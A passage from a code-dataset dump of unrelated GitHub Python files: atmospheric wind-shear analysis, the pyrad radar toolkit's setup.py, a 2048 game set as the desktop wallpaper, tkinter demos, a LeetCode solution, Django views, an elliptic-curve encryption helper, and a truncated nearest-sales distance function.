Dataset('/data/arm/l.0018000.track.nc','r')\narmtrack198 = Dataset('/data/arm/l.0019800.track.nc','r')\narmtrack216 = Dataset('/data/arm/l.0021600.track.nc','r')\narmtrack234 = Dataset('/data/arm/l.0023400.track.nc','r')\narmtrack252 = Dataset('/data/arm/l.0025200.track.nc','r')\narmtrack270 = Dataset('/data/arm/l.0027000.track.nc','r')\narmtrack288 = Dataset('/data/arm/l.0028800.track.nc','r')\n\narmtrack504 = Dataset('/data/arm/l.0050400.track.nc','r')\narmtrack522 = Dataset('/data/arm/l.0052200.track.nc','r')\n\n\nfilenames=[bomexd, ricod, armd]\n\nbomexfilenames=[bomextrack18, bomextrack36, bomextrack54, bomextrack72, bomextrack90, bomextrack108, bomextrack126, bomextrack144, bomextrack162, bomextrack180, bomextrack198, bomextrack216]\nricofilenames=[ricotrack36, ricotrack72, ricotrack108, ricotrack144, ricotrack180, ricotrack216, ricotrack252, ricotrack288, ricotrack324, ricotrack360, ricotrack396]\narmfilenames=[armtrack108, armtrack126, armtrack144, armtrack162, armtrack180, armtrack198, armtrack216, armtrack234, armtrack252, armtrack270, armtrack288]\n\n###########################################################################\n\n####################################\n \n# script\nfilenames=[ricod]\nbomexfilenames=[bomextrack342]\nricofilenames=[ricotrack828]\narmfilenames=[armtrack126]\nconditional_height=2000\n\n\n\nfor file in filenames:\n #zt=file.variables['z'][:]\n zh=file.variables['zh'][:]\n time_t=file.variables['time'][:]\n u=file.variables['u'][:,:]\n v=file.variables['v'][:,:]\n w=file.variables['w'][:,:]\n\n \n \n if file == ricod:\n for file1 in ricofilenames:\n ht=file1.variables['ht'][:]\n cb=file1.variables['cb'][:]\n ct=file1.variables['ct'][:]\n cv=file1.variables['cv'][:]\n cp=file1.variables['cp'][:]\n overlap_ratio=file1.variables['chr'][:]\n area_proj=file1.variables['area_proj'][:]\n nrcloud=file1.variables['nrcloud'][:,:,:]\n cfrac=file1.variables['cfrac'][:]\n zt=file1.variables['z'][:]\n xt=file1.variables['x'][:]\n yt=file1.variables['y'][:]\n nr=file1.variables['nr'][:]\n cld_mask=file1.variables['cld_mask'][:,:,:]\n \n \n nrcloudarray = np.ma.getdata(nrcloud) # unmask array\n dx=xt[1]-xt[0];dy=yt[1]-yt[0];dz=zt[1]-zt[0];\n gridarea=dx*dy\n gridvol=dx*dy*dz\n nx=xt.size;ny=yt.size;nz=zt.size;\n \n uv=np.zeros((time_t.size, zt.size))\n grad=np.zeros((time_t.size, zt.size))\n for t in range(time_t.size):\n unew=u[t,:]\n vnew=v[t,:]\n uv[t]=pyth(unew,vnew)\n grad[t]=np.gradient(uv[t])\n \n uv_z=np.mean(uv, axis=0) # average among different times\n grad_z=np.mean(grad, axis=0) # average among different times\n \n #uv_diff=np.zeros(zt.size -1)\n #for i in range(zt.size -1):\n # uv_diff[i] = uv_z[i+1] - uv_z[i]\n \n \n shear0 = ( uv_z[ct] - uv_z[cb] ) / 1\n shear1 = uv_z[ct] - uv_z[cb-1] # need to subtract 1 from cb OR add 1 to ct\n shear2 = uv_z[ct+1] - uv_z[cb] # need to subtract 1 from cb OR add 1 to ct\n shear3 = np.zeros(cb.size)\n #shear4 = np.zeros(cb.size)\n s1 = np.zeros(cb.size)\n A_T=np.zeros(cb.size)\n s2=np.zeros(cb.size)\n s3= ( ( (dz*ct)**2 - (dz*cb)**2 ) / ht**2 )**(1/4)\n for i in range(cb.size):\n shear3[i] = sum(grad_z[cb[i]:ct[i]+1]) / 1\n #shear4[i] = sum(uv_diff[cb[i]+1:ct[i]+1])\n if uv_z[ct[i]] >= uv_z[cb[i]]:\n s1[i]=2*dz*sum(uv_z[cb[i]:ct[i]+1]) / (ht[i]*ht[i])\n A_T[i]=dz*sum(uv_z[cb[i]:ct[i]+1])\n s2[i]= ( uv_z[ct[i]] - uv_z[cb[i]] )**2 / (2*dz*sum(uv_z[cb[i]:ct[i]+1]))\n elif uv_z[ct[i]] < uv_z[cb[i]]:\n s1[i]=-2*dz*sum(uv_z[cb[i]:ct[i]+1]) / (ht[i]*ht[i])\n A_T[i]=-dz*sum(uv_z[cb[i]:ct[i]+1]) \n \n index_shear=np.where(ht > 0)\n ht_shear=ht[index_shear[0]] # taking the ht values according to indices above\n overlap_ratio_shear=overlap_ratio[index_shear[0]];\n s1_shear= s1[index_shear[0]]\n s2_shear= s2[index_shear[0]]\n \n ### plot shear vs. overlap\n bins=dz\n \n plt.figure()\n plt.hist2d(overlap_ratio,shear3,bins=bins,cmin=0.5)\n plt.title('shear vs. overlap')\n colorbar = plt.colorbar()\n colorbar.set_label('counts in bin')\n \n plt.figure()\n plt.hist2d(overlap_ratio,shear0,bins=bins,cmin=0.5)\n plt.title('shear vs. overlap')\n colorbar = plt.colorbar()\n colorbar.set_label('counts in bin')\n \n plt.figure()\n plt.hist2d(overlap_ratio_shear,s1_shear,bins=bins,cmin=0.5)\n plt.title('shear vs. overlap')\n colorbar = plt.colorbar()\n colorbar.set_label('counts in bin')\n \"\"\"\n plt.figure()\n plt.hist2d(overlap_ratio_shear,s2_shear,bins=bins,cmin=0.5)\n plt.title('shear vs. overlap')\n colorbar = plt.colorbar()\n colorbar.set_label('counts in bin')\n \"\"\"\n\n###################################\n\nend= time.time()\nprint('Run Time in Seconds:', end-start)\n\n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","repo_name":"thijsheus/overlap","sub_path":"scripts/windshear4.py","file_name":"windshear4.py","file_ext":"py","file_size_in_byte":10613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"166985823","text":"#!/usr/bin/env python\n\"\"\"Pyrad: Python Radar Toolkit\n\nPyrad is a Python module containing\nthe utilities that run the MeteoSwiss radar processing framework.\nIt is designed so that it accepts a growing number of radar data types.\nThe core of the processing is performed by the module Py-ART.\n\n\"\"\"\n\nimport os\nimport shutil\nimport sys\nimport re\nimport subprocess\nimport glob\nimport builtins\nfrom datetime import datetime\nimport getpass\nimport setuptools # for 'develop' mode\n\nDOCLINES = __doc__.split(\"\\n\")\n\nCLASSIFIERS = \"\"\"\\\nDevelopment Status :: 0 - Prototype\nIntended Audience :: Science/Research\nIntended Audience :: Developers\nLicense :: OSI Approved :: BSD License\nProgramming Language :: Python\nProgramming Language :: Python :: 3\nProgramming Language :: Python :: 3.6\nProgramming Language :: Python :: 3.7\nProgramming Language :: C\nProgramming Language :: Cython\nTopic :: Scientific/Engineering\nTopic :: Scientific/Engineering :: Atmospheric Science\nOperating System :: POSIX :: Linux\n\"\"\"\n\n\nNAME = 'pyrad_mch'\nMAINTAINER = \"MeteoSwiss Pyrad Developers\"\nMAINTAINER_EMAIL = \"jordi.figuerasiventura@meteoswiss.ch\"\nDESCRIPTION = DOCLINES[0]\nLONG_DESCRIPTION = \"\\n\".join(DOCLINES[2:])\nURL = \"https://github.com/meteoswiss-mdr/pyrad.git\"\nDOWNLOAD_URL = \"https://github.com/meteoswiss-mdr/pyrad.git\"\nLICENSE = 'BSD'\nCLASSIFIERS = filter(None, CLASSIFIERS.split('\\n'))\nPLATFORMS = [\"Linux\"]\nMAJOR = 0\nMINOR = 5\nMICRO = 0\nISRELEASED = True\nVERSION = '%d.%d.%d' % (MAJOR, MINOR, MICRO)\nSCRIPTS = glob.glob('scripts/*')\nCOMPILE_DATE_TIME = datetime.utcnow().strftime(\"%Y-%m-%d %H:%M\")\nUSERNAME = getpass.getuser()\n\n\n# Return the git revision as a string\ndef git_version():\n def _minimal_ext_cmd(cmd):\n # construct minimal environment\n env = {}\n for k in ['SYSTEMROOT', 'PATH']:\n v = os.environ.get(k)\n if v is not None:\n env[k] = v\n # LANGUAGE is used on win32\n env['LANGUAGE'] = 'C'\n env['LANG'] = 'C'\n env['LC_ALL'] = 'C'\n out = subprocess.Popen(\n cmd, stdout=subprocess.PIPE, env=env).communicate()[0]\n return out\n\n try:\n out = _minimal_ext_cmd(['git', 'rev-parse', 'HEAD'])\n GIT_REVISION = out.strip().decode('ascii')\n except OSError as ee:\n GIT_REVISION = \"Unknown\"\n\n return GIT_REVISION\n\n# BEFORE importing distutils, remove MANIFEST. distutils doesn't properly\n# update it when the contents of directories change.\nif os.path.exists('MANIFEST'):\n os.remove('MANIFEST')\n\n# This is a bit hackish: we are setting a global variable so that the main\n# pyrad __init__ can detect if it is being loaded by the setup routine, to\n# avoid attempting to load components that aren't built yet. While ugly, it's\n# a lot more robust than what was previously being used.\nbuiltins.__PYRAD_SETUP__ = True\n\n\ndef write_version_py(filename='pyrad/version.py'):\n cnt = \"\"\"\n# THIS FILE IS GENERATED FROM PYRAD_PROC SETUP.PY\nshort_version = '%(version)s'\nversion = '%(version)s'\nfull_version = '%(full_version)s'\ngit_revision = '%(git_revision)s'\ncompile_date_time = '%(compile_date_time)s'\nusername = '%(username)s'\nrelease = %(isrelease)s\n\nif not release:\n version = full_version\n\"\"\"\n # Adding the git rev number needs to be done inside write_version_py(),\n # otherwise the import of pyrad.version messes up the build under Python 3.\n FULLVERSION = VERSION\n if os.path.exists('../../.git'):\n GIT_REVISION = git_version()\n elif os.path.exists('pyrad/version.py'):\n # must be a source distribution, use existing version file\n try:\n from pyrad.version import git_revision as GIT_REVISION\n except ImportError:\n raise ImportError(\"Unable to import git_revision. Try removing \"\n \"pyrad/version.py and the build directory \"\n \"before building.\")\n else:\n GIT_REVISION = \"Unknown\"\n\n if not ISRELEASED:\n FULLVERSION += '.dev+' + GIT_REVISION[:7]\n\n a = open(filename, 'w')\n try:\n a.write(cnt % {'version': VERSION,\n 'full_version': FULLVERSION,\n 'git_revision': GIT_REVISION,\n 'compile_date_time': COMPILE_DATE_TIME,\n 'username': USERNAME,\n 'isrelease': str(ISRELEASED)})\n finally:\n a.close()\n\n\ndef configuration(parent_package='', top_path=None):\n from numpy.distutils.misc_util import Configuration\n config = Configuration(None, parent_package, top_path)\n config.set_options(ignore_setup_xxx_py=True,\n assume_default_configuration=True,\n delegate_options_to_subpackages=True,\n quiet=True)\n\n config.add_subpackage('pyrad')\n config.add_data_files(('pyrad', '*.txt'))\n\n return config\n\n\ndef setup_package():\n\n # rewrite version file\n write_version_py()\n\n from numpy.distutils.core import setup\n\n setup(\n name=NAME,\n maintainer=MAINTAINER,\n maintainer_email=MAINTAINER_EMAIL,\n description=DESCRIPTION,\n long_description=LONG_DESCRIPTION,\n url=URL,\n version=VERSION,\n download_url=DOWNLOAD_URL,\n license=LICENSE,\n classifiers=CLASSIFIERS,\n platforms=PLATFORMS,\n configuration=configuration,\n scripts=SCRIPTS,\n )\n\nif __name__ == '__main__':\n setup_package()\n","repo_name":"meteoswiss-mdr/pyrad","sub_path":"src/pyrad_proc/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":5442,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"53"} +{"seq_id":"21869222456","text":"import os\r\nimport random\r\nimport tempfile\r\nfrom PIL import Image, ImageDraw, ImageFont\r\nimport keyboard\r\nimport ctypes\r\nimport time\r\n\r\nBACKGROUND_PATH = os.path.join(tempfile.gettempdir(), \"2048.png\")\r\n\r\ndef new_board(size=4):\r\n return [[0] * size for _ in range(size)]\r\n\r\ndef add_new_tile(board, size=4):\r\n empty_tiles = [(x, y) for x in range(size) for y in range(size) if board[x][y] == 0]\r\n if empty_tiles:\r\n x, y = random.choice(empty_tiles)\r\n board[x][y] = random.choices([2, 4], weights=[0.75, 0.25])[0]\r\n elif not has_possible_combinations(board):\r\n img = render_board(board, game_over=True)\r\n set_wallpaper(img)\r\n print(\"Game Over... Restarting game...\")\r\n time.sleep(5)\r\n main()\r\n\r\ndef has_possible_combinations(board):\r\n for row in board:\r\n if 0 in row:\r\n return True\r\n for i in range(len(board)):\r\n for j in range(len(board[0]) - 1):\r\n if board[i][j] == board[i][j + 1] or board[j][i] == board[j + 1][i]:\r\n return True\r\n\r\n return False\r\n\r\ndef move_row_left(row):\r\n non_zeros = [x for x in row if x != 0]\r\n new_row = []\r\n skip = False\r\n\r\n for i in range(len(non_zeros)):\r\n if skip:\r\n skip = False\r\n continue\r\n\r\n if i < len(non_zeros) - 1 and non_zeros[i] == non_zeros[i + 1]:\r\n new_row.append(2 * non_zeros[i])\r\n skip = True\r\n else:\r\n new_row.append(non_zeros[i])\r\n\r\n return new_row + [0] * (len(row) - len(new_row))\r\n\r\ndef move_board(board, direction):\r\n size = len(board)\r\n if direction == 'left':\r\n board = [move_row_left(row) for row in board]\r\n elif direction == 'right':\r\n board = [move_row_left(row[::-1])[::-1] for row in board]\r\n elif direction == 'up':\r\n board = [list(row) for row in zip(*[move_row_left(row) for row in zip(*board)])]\r\n elif direction == 'down':\r\n board = [list(row) for row in zip(*[move_row_left(row[::-1])[::-1] for row in zip(*board)])]\r\n return board\r\n\r\ndef tile_color(value):\r\n colors = {\r\n 2: (238, 228, 218),\r\n 4: (237, 224, 200),\r\n 8: (242, 177, 121),\r\n 16: (245, 149, 99),\r\n 32: (246, 124, 95),\r\n 64: (246, 94, 59),\r\n 128: (237, 207, 114),\r\n 256: (237, 204, 97),\r\n 512: (237, 200, 80),\r\n 1024: (237, 197, 63),\r\n 2048: (237, 194, 46),\r\n }\r\n return colors.get(value, (205, 193, 180))\r\n\r\ndef draw_game_over(img, game_over=False):\r\n if game_over:\r\n draw = ImageDraw.Draw(img)\r\n text = \"Game over\"\r\n font = ImageFont.truetype(\"arial.ttf\", 60)\r\n text_bbox = draw.textbbox((0, 0), text, font=font)\r\n w, h = text_bbox[2] - text_bbox[0], text_bbox[3] - text_bbox[1]\r\n draw.text(\r\n ((img.width - w) // 2, (img.height - h) // 2),\r\n text,\r\n font=font,\r\n fill=(0, 0, 0, 128),\r\n stroke_width=2,\r\n stroke_fill=(255, 255, 255, 128)\r\n )\r\n\r\ndef render_board(board, size=4, tile_size=100, background_color=(187, 173, 160), game_over=False):\r\n img_size = size * tile_size\r\n img = Image.new('RGBA', (img_size, img_size), background_color)\r\n draw = ImageDraw.Draw(img)\r\n\r\n for x in range(size):\r\n for y in range(size):\r\n value = board[y][x]\r\n if value:\r\n draw.rectangle(\r\n [x * tile_size, y * tile_size, (x + 1) * tile_size, (y + 1) * tile_size],\r\n fill=tile_color(value),\r\n outline=(197, 173, 160),\r\n width=2\r\n )\r\n text = str(value)\r\n font = ImageFont.truetype(\"arial.ttf\", 40)\r\n text_bbox = draw.textbbox((0, 0), text, font=font)\r\n w, h = text_bbox[2] - text_bbox[0], text_bbox[3] - text_bbox[1]\r\n draw.text(\r\n (x * tile_size + (tile_size - w) // 2, y * tile_size + (tile_size - h) // 2),\r\n text,\r\n font=font,\r\n fill='black' if value < 8 else 'white'\r\n )\r\n draw_game_over(img, game_over)\r\n return img\r\n\r\ndef set_wallpaper(img):\r\n img.save(BACKGROUND_PATH)\r\n ctypes.windll.user32.SystemParametersInfoW(20, 0, BACKGROUND_PATH, 3)\r\n\r\ndef main():\r\n board = new_board()\r\n add_new_tile(board)\r\n add_new_tile(board)\r\n\r\n while True:\r\n img = render_board(board)\r\n set_wallpaper(img)\r\n\r\n if keyboard.is_pressed('left'):\r\n board = move_board(board, 'left')\r\n add_new_tile(board)\r\n elif keyboard.is_pressed('right'):\r\n board = move_board(board, 'right')\r\n add_new_tile(board)\r\n elif keyboard.is_pressed('up'):\r\n board = move_board(board, 'up')\r\n add_new_tile(board)\r\n elif keyboard.is_pressed('down'):\r\n board = move_board(board, 'down')\r\n add_new_tile(board)\r\n elif keyboard.is_pressed('R'):\r\n main()\r\n\r\nif __name__ == \"__main__\":\r\n print(\"Game started\")\r\n main()\r\n","repo_name":"ImPavloh/2048-Wallpaper-Edition","sub_path":"2048.py","file_name":"2048.py","file_ext":"py","file_size_in_byte":5136,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16690835375","text":"#程序文件ex11_9.py\r\nimport numpy as np\r\nimport sympy as sp\r\nfrom numpy.linalg import inv\r\nf = open('data11_9.txt'); d = f.readlines()\r\na = []; b = []\r\nfor i in range(2): a.extend(d[i].split())\r\na = np.array([eval(e) for e in a]).reshape(2,-1)\r\nmu1 = a.mean(axis=1, keepdims=True); s1 = np.cov(a, ddof=1)\r\nfor i in range(2,4): b.extend(d[i].split())\r\nb = np.array([eval(e) for e in b]).reshape(2,-1)\r\nmu2 = b.mean(axis=1, keepdims=True); s2 = np.cov(b, ddof=1)\r\nsp.var('x1,x2'); X = sp.Matrix([x1, x2]) #X为列向量\r\nd1 = (X-mu1).T@inv(s1)@(X-mu1)\r\nd1 = sp.expand(d1)\r\nd2 = (X-mu2).T@inv(s2)@(X-mu2)\r\nd2 = sp.expand(d2)\r\nW = sp.lambdify('x1,x2', d1-d2, 'numpy')\r\nsol = W(np.array([1.24,1.28,1.40]), np.array([1.80,1.84,2.04]))\r\ncheck1 = W(a[0], a[1]); check2 = W (b[0], b[1])\r\nprint(np.round(sol,4)) #输出3个判别函数值\r\n","repo_name":"LuyuZhang00/CUMCM2022","sub_path":"python数学建模算法与应用/11第11章 聚类分析与判别分析模型/ex11_9.py","file_name":"ex11_9.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"38607645238","text":"import tkinter as tk\n\nclass Dice_Roll_GUI:\n\n def __init__(self):\n self.root = tk.Tk()\n self.root.rowconfigure([0,1], minsize=300, weight=1)\n self.root.columnconfigure(0, minsize=300, weight=1)\n\n self.rollBtn = tk.Button(self.root, text=\"Roll\", font=(\"Arial\", 20), command=self.roll, relief=\"raised\")\n self.rollBtn.grid( row=0, sticky=\"nswe\")\n\n #lbl can be empty, i.e. without text\n self.result_lbl = tk.Label(self.root, text=\"ROLL ME!\", font=(\"Arial\", 20))\n self.result_lbl.grid( row=1, sticky=\"nswe\")\n\n self.root.mainloop()\n\n def roll(self):\n #uses random to roll a six-sided dice with different colours on each side \n import random\n colours = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\n val = random.randrange(1,7)\n self.result_lbl[\"text\"] = str(val)\n self.result_lbl[\"background\"] = colours[val-1]\n\nDice_Roll_GUI()","repo_name":"AaronYin5758/Tkinter","sub_path":"dice_roll.py","file_name":"dice_roll.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9762057013","text":"'''\nвиджеты\nmenu ..\ntext\n wrap - перенос по буквам or по словам\n insertbackground- цвет курсора\n selectbackground - цвет выделения\n ызфсштп1\\ызфсштп2\\spacing3 - м\nScrollbar привязать не только к текстовой области но и квиджеу\n связь scrollbar с текстовым полем по нужной оси\n'''\n\nfrom tkinter import *\nroot = Tk()\nroot.geometry('800x600+500+200')\n\nf_menu = Frame(root, bg=\"#1F252A\", height=40)\nf_text = Frame(root)\nf_menu.pack(fill=X)\nf_text.pack(fill=BOTH,expand=1)\n\nl_menu = Label(f_menu, text=\"Menu\", bg=\"#2B3239\", fg=\"#C6DEC1\", font=\"Arial 10\")\nl_menu.place(x=10, y=10)\n\nt = Text(f_text, bg=\"#343D46\", fg=\"#C6DEC1\", padx=10, pady=10, wrap=WORD,\n insertbackground=\"#EDA756\", selectbackground=\"#4E5A65\", spacing3=10)\nt.pack(fill=BOTH,expand=1, side=LEFT)\n\nscroll = Scrollbar(f_text, command=t.yview)\nscroll.pack(fill=Y, side=LEFT)\nt.config(yscrollcommand=scroll.set)# настроенный скролл сюда подставляем\nroot.mainloop()","repo_name":"LizaPleshkova/PythonLessonsPart2","sub_path":"venv/lessons/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28898364617","text":"# https://leetcode.com/problems/partition-array-for-maximum-sum/description/\n# https://leetcode.com/problems/partition-array-for-maximum-sum/solutions/290863/java-c-python-dp-o-k-space/\n\n\n# bottom-up dp, TC:O(NM), SC:O(N)\ndef maxSumAfterPartitioning(arr: List[int], k: int) -> int:\n # dp[i]: max sum of arr[:i+1]\n n = len(arr)\n dp = [0] * (n + 1)\n for i in range(1, n + 1):\n value = 0\n for j in range(1, min(i, k) + 1):\n value = max(value, arr[i - j])\n dp[i] = max(dp[i], value * j + dp[i - j])\n return dp[-1]\n\n\n# bottom-up dp, TC:O(NM), SC:O(N)\ndef maxSumAfterPartitioning2(arr: List[int], k: int) -> int:\n # dp[i]: max sum of arr[:i]\n n = len(arr)\n dp = [0] * (n + 1)\n for i in range(1, n+1):\n value = arr[i-1]\n dp[i] = dp[i-1] + value\n for j in range(2, min(i, k)+1): # update max value\n value = max(value, arr[i-j])\n dp[i] = max(dp[i], value * j + dp[i-j])\n return dp[-1]","repo_name":"ychanc2104/LeetCode","sub_path":"Partition Array for Maximum Sum.py","file_name":"Partition Array for Maximum Sum.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"73770723368","text":"import torch\nimport os\n\nclass ONNX_util:\n\n @staticmethod\n def save_yolact(model,dataset, file_name, verbose=True):\n if(os.path.isfile(file_name) ):\n os.remove(file_name)\n dummy_input= list(range(len(dataset)))[0]\n img, gt, gt_masks, h, w, num_crowd = dataset.pull_item(dummy_input)\n batch = img.unsqueeze(0)\n batch = batch.cuda()\n\n torch.onnx.export(model, (batch), file_name, verbose,opset_version=11)","repo_name":"h-aboutalebi/yolact_min","sub_path":"utils/onnx_util.py","file_name":"onnx_util.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9626516017","text":"# Elliptic Curve Cryptographic system\n# uses curve P-256 as default for generating private key\n\nimport os\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import ec\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\n\n\nclass EllipticCurveSystem:\n\n def __init__(self, private_key=None):\n if private_key is None:\n private_key = ec.generate_private_key(ec.SECP256R1())\n\n self.private_key = private_key\n self.public_key = private_key.public_key()\n\n def create_pem(self) -> bytes:\n pem = self.public_key.public_bytes(\n encoding=serialization.Encoding.PEM,\n format=serialization.PublicFormat.SubjectPublicKeyInfo\n )\n return pem\n\n def derive_shared_secret(self, peer_public_key, salt=None) -> tuple[bytes, bytes]:\n \"\"\"Derive shared secret using Elliptic-curve Diffie-Hellman (ECDH)\"\"\"\n if salt is None:\n salt = os.urandom(16)\n shared_secret = self.private_key.exchange(ec.ECDH(), peer_public_key)\n derived_key = PBKDF2HMAC(\n algorithm=hashes.SHA256(),\n length=32,\n salt=salt,\n iterations=100000,\n ).derive(shared_secret)\n return salt, derived_key\n\n def encrypt_message(self, peer_public_key, message: bytes) -> tuple[bytes, bytes, bytes, bytes]:\n \"\"\"Encrypt a message using a symmetric key derived from a shared secret.\"\"\"\n salt, symmetric_key = self.derive_shared_secret(peer_public_key)\n nonce = os.urandom(16)\n cipher = Cipher(algorithms.AES(symmetric_key), modes.GCM(nonce))\n encryptor = cipher.encryptor()\n ciphertext = encryptor.update(message) + encryptor.finalize()\n\n return (salt, nonce, ciphertext, encryptor.tag)\n\n def decrypt_message(\n self,\n peer_public_key: bytes,\n salt: bytes,\n nonce: bytes,\n ciphertext: bytes,\n tag: bytes\n ) -> str:\n \"\"\"Decrypt a message using a symmetric key derived from a shared secret.\"\"\"\n _, symmetric_key = self.derive_shared_secret(peer_public_key, salt)\n cipher = Cipher(algorithms.AES(symmetric_key), modes.GCM(nonce, tag))\n decryptor = cipher.decryptor()\n plaintext = decryptor.update(ciphertext) + decryptor.finalize()\n return plaintext.decode(\"utf-8\")\n\n def sign_message(self, message: bytes) -> bytes:\n signature = self.private_key.sign(\n message,\n ec.ECDSA(hashes.SHA256())\n )\n return signature\n\n def verify_signature(self, message: bytes, signature: bytes):\n try:\n self.public_key.verify(\n signature,\n message,\n ec.ECDSA(hashes.SHA256())\n )\n print(\"The signature is valid!\")\n except Exception as e:\n print(e.__class__.__name__)\n print(\"The signature is invalid!\")\n\n\n\nif __name__ == \"__main__\":\n\n # Two parties want to speak in secret: \n message = \"foo bar\".encode(\"utf-8\")\n ecc = EllipticCurveSystem()\n ecc_peer = EllipticCurveSystem()\n\n # Generate the shared secret to encrypt messages with:\n peer_public_key_serialized = ecc_peer.create_pem()\n peer_public_key = serialization.load_pem_public_key(peer_public_key_serialized)\n shared_secret = ecc.derive_shared_secret(peer_public_key)\n\n # Encrypt the message:\n encrypted_msg = ecc.encrypt_message(peer_public_key, message)\n\n # Decrypt the message:\n decrypted_msg = ecc.decrypt_message(\n peer_public_key=peer_public_key,\n salt=encrypted_msg[0],\n nonce=encrypted_msg[1],\n ciphertext=encrypted_msg[2],\n tag=encrypted_msg[3])\n\n print(decrypted_msg)\n","repo_name":"FirstFlush/crypto","sub_path":"ecc.py","file_name":"ecc.py","file_ext":"py","file_size_in_byte":3896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32290871673","text":"from django.views.generic import ListView, DetailView\nfrom django.db.models import Avg\nfrom .model import Subject\nfrom ..evaluation.model import Evaluation\nfrom ..evaluation.forms import ExperienceForm, RateForm, CommentForm\n\nclass SubjectDetail(DetailView):\n model = Subject\n template_name = 'subject/details.html'\n context_object_name = 'materia'\n\n def post(self, request, *args, **kwargs):\n mat = self.get_object()\n\n experience_form = ExperienceForm(request.POST, prefix='experience_form')\n comment_form = CommentForm(request.POST, prefix='comment_form')\n rate_form = RateForm(request.POST, prefix='rate_form')\n\n exist = Evaluation.objects.filter(user=self.request.user).first()\n\n if experience_form.is_valid() and 'submit_experience' in request.POST:\n if exist:\n exist.professor = experience_form.cleaned_data['professor']\n exist.learning = experience_form.cleaned_data['learning']\n exist.difficult = experience_form.cleaned_data['difficult']\n exist.punctuality = experience_form.cleaned_data['punctuality']\n exist.save()\n else:\n experience = experience_form.save(commit=False)\n experience.subject = mat\n experience.user = self.request.user\n experience.save()\n return self.get(request, *args, **kwargs)\n\n if comment_form.is_valid() and 'submit_comment' in request.POST:\n if exist:\n exist.comment = comment_form.cleaned_data['comment']\n exist.save()\n else:\n comment = comment_form.save(commit=False)\n comment.subject = mat\n comment.user = self.request.user\n comment.save()\n return self.get(request, *args, **kwargs)\n\n if rate_form.is_valid() and 'submit_rate' in request.POST:\n if exist:\n exist.complexity = rate_form.cleaned_data['complexity']\n exist.save()\n else:\n rate = rate_form.save(commit=False)\n rate.subject = mat\n rate.user = self.request.user\n rate.save()\n return self.get(request, *args, **kwargs)\n\n return super().get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = \"Detalles\"\n context['subtitle'] = \"Materia\"\n\n i = context['materia']\n i.count = Evaluation.objects.filter(subject=i).count()\n avg_complexity = Evaluation.objects.filter(subject=i).aggregate(avg_complexity=Avg('complexity'))\n i.avg = avg_complexity['avg_complexity'] if avg_complexity['avg_complexity'] is not None else \"N/A\"\n\n evaluations = Evaluation.objects.filter(subject=i)\n context['evaluacion'] = evaluations\n\n context['experience_form'] = ExperienceForm(prefix='experience_form')\n context['rate_form'] = RateForm(prefix='rate_form')\n context['comment_form'] = CommentForm(prefix='comment_form')\n\n return context\n \nclass SubjectList(ListView):\n model = Subject\n template_name = 'subject/explore.html'\n context_object_name = 'materias'\n paginate_by = 9\n\n def get_queryset(self):\n query = self.request.GET.get('search_query')\n if query:\n queryset = Subject.objects.filter(name__icontains=query)\n else:\n queryset = Subject.objects.all()\n return queryset\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = \"Catálogo\"\n context['subtitle'] = \"Materias\"\n context['search'] = self.request.GET.get('search_query', '')\n for i in context['materias']:\n i.count = Evaluation.objects.filter(subject=i).count()\n avg_complexity = Evaluation.objects.filter(subject=i).aggregate(avg_complexity=Avg('complexity'))\n i.avg = avg_complexity['avg_complexity'] if avg_complexity['avg_complexity'] is not None else \"N/A\"\n return context","repo_name":"hectordomin/ModularP-evidences","sub_path":"app/website/core/erp/utils/subject/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34919101142","text":"import pandas as pd\r\nimport numpy as np\r\nimport math\r\n\r\ndef find_closest_sales(n_closest, sales_df, property_lat, property_lon):\r\n# --> dataframe of n closest sales\r\n ################# Brute Force method iterating over each row ################\r\n # Time complext for this method:\r\n # 1. for each property, iterate through sales_df and calculate distance, it will take O(N)\r\n # 2. sorting and get top n_closest will take O(NlogN): it can be optimized to O(Nlog(n_closest))\r\n # 3. if properties have total of M values, the toal time complexity is O(MN + MNlogN)\r\n sales_df['distance'] = 0.0\r\n for i in range(len(sales_df)):\r\n sales_df.loc[i, 'distance']= 3963 * 2 * math.asin(math.sqrt(math.sin((math.radians(sales_df.loc[i, 'lat']) - math.radians(property_lat))/2)**2 + math.cos(math.radians(property_lat)) * math.cos(math.radians(sales_df.loc[i, 'lat'])) * math.sin((math.radians(sales_df.loc[i, 'long']) - math.radians(property_lon))/2)**2))\r\n return sales_df.sort_values(\"distance\", ascending=True).head(n_closest).drop(\"distance\", axis=1)\r\n ################ Use df.apply method##########################################\r\n # sales_df['distance'] = sales_df.apply(lambda cols: 3963 * 2 * 